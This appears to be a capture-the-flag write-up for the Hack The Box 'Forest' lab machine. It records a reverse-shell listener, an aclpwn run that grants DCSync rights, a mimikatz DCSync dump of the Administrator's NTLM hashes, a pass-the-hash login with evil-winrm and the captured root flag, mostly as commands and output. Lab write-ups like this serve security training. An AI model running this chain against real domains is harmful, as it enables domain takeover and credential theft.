Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\svc-alfresco\Documents>


We run the command lsadump::dcsync /domain:htb.local /user:Administrator which doesnt seem to be working

┌──(kali㉿kali)-[~/Downloads/x64]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.161] 51307
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\svc-alfresco\Documents>./mimikatz.exe
./mimikatz.exe
'.' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\svc-alfresco\Documents>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.1.1 (x64) #17763 Dec  9 2018 23:56:50
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

mimikatz # mimikatz # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
ERROR mimikatz_doLocal ; "mimikatz" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

mimikatz # ERROR mimikatz_doLocal ; "[DC]" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

mimikatz # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

mimikatz # 

we can try Invoke-Mimikatz.ps1 – Invoke-Mimikatz -Command ‘”lsadump::dcsync /domain:htb.local /user:Administrator”‘

but we get same error as above

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . ./Invoke-Mimikatz.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:htb.local /user:Administrator"'
Access denied 
At C:\Users\svc-alfresco\Documents\Invoke-Mimikatz.ps1:2579 char:27
+             $Processors = Get-WmiObject -Class Win32_Processor
+                           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
The property 'AddressWidth' cannot be found on this object. Verify that the property exists.
At C:\Users\svc-alfresco\Documents\Invoke-Mimikatz.ps1:2593 char:14
+ ...        if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8 ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict
Hostname: FOREST.htb.local / S-1-5-21-3072663084-364016917-1341370565

  .#####.   mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 

we run the command again and choose 1

┌──(kali㉿kali)-[~]
└─$  ~/.local/bin/aclpwn -f [email protected] -t htb.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.161 -sp s3rvice
[!] Unsupported operation: GetChanges on HTB.LOCAL (Domain,Base)
[-] Invalid path, skipping
[!] Unsupported operation: GenericAll on EXCH01.HTB.LOCAL (Computer,Base)
[-] Invalid path, skipping
[+] Path found!
Path [0]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE TRUSTED [email protected])-[MemberOf]->(EXCHANGE WINDOWS [email protected])-[WriteDacl]->(HTB.LOCAL)
[+] Path found!
Path [1]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE WINDOWS [email protected])-[WriteDacl]->(HTB.LOCAL)
Please choose a path [0-1] 1
[-] Memberof -> continue
[-] Memberof -> continue
[-] Memberof -> continue
[-] Adding user SVC-ALFRESCO to group EXCHANGE WINDOWS [email protected]
[+] Added CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local as member to CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
[-] Re-binding to LDAP to refresh group memberships of [email protected]
[+] Re-bind successful
[-] Modifying domain DACL to give DCSync rights to SVC-ALFRESCO
[+] Dacl modification successful
[+] Finished running tasks
[+] Saved restore state to aclpwn-20230909-093211.restore

Then try mimikatz again and this time we get the hash

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:htb.local /user:Administrator"'
Access denied 
At C:\Users\svc-alfresco\Documents\Invoke-Mimikatz.ps1:2579 char:27
+             $Processors = Get-WmiObject -Class Win32_Processor
+                           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
The property 'AddressWidth' cannot be found on this object. Verify that the property exists.
At C:\Users\svc-alfresco\Documents\Invoke-Mimikatz.ps1:2593 char:14
+ ...        if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8 ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict
Hostname: FOREST.htb.local / S-1-5-21-3072663084-364016917-1341370565

  .#####.   mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
User Principal Name  : [email protected]
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   :
Password last change : 8/30/2021 5:51:58 PM
Object Security ID   : S-1-5-21-3072663084-364016917-1341370565-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 32693b11e6aa90eb43d32c72a07ceea6
    ntlm- 0: 32693b11e6aa90eb43d32c72a07ceea6
    ntlm- 1: 9307ee5abf7791f3424d9d5148b20177
    ntlm- 2: 32693b11e6aa90eb43d32c72a07ceea6
    lm  - 0: 9498c81fd53411e023fcd1ff4cd3e482
    lm  - 1: f505fe58b1dedbe3015454d212af5115

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : cad4a87763ba795c795b96486148bb95

* Primary:Kerberos-Newer-Keys *
    Default Salt : HTB.LOCALAdministrator
    Default Iterations : 4096

We use evil-winrm and pass the hash –evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.10.10.161 -u  Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/20/2019   4:04 PM                Contacts
d-r---        9/23/2019   2:15 PM                Desktop
d-r---        9/23/2019   3:46 PM                Documents
d-r---        9/20/2019   4:04 PM                Downloads
d-r---        9/20/2019   4:04 PM                Favorites
d-r---        9/20/2019   4:04 PM                Links
d-r---        9/20/2019   4:04 PM                Music
d-r---        9/20/2019   4:04 PM                Pictures
d-r---        9/20/2019   4:04 PM                Saved Games
d-r---        9/20/2019   4:04 PM                Searches
d-r---        9/20/2019   4:04 PM                Videos


c*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         9/9/2023   5:38 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
cdb539c41b826bb97ec6dfbf750a375d
*Evil-WinRM* PS C:\Users\Administrator\Desktop>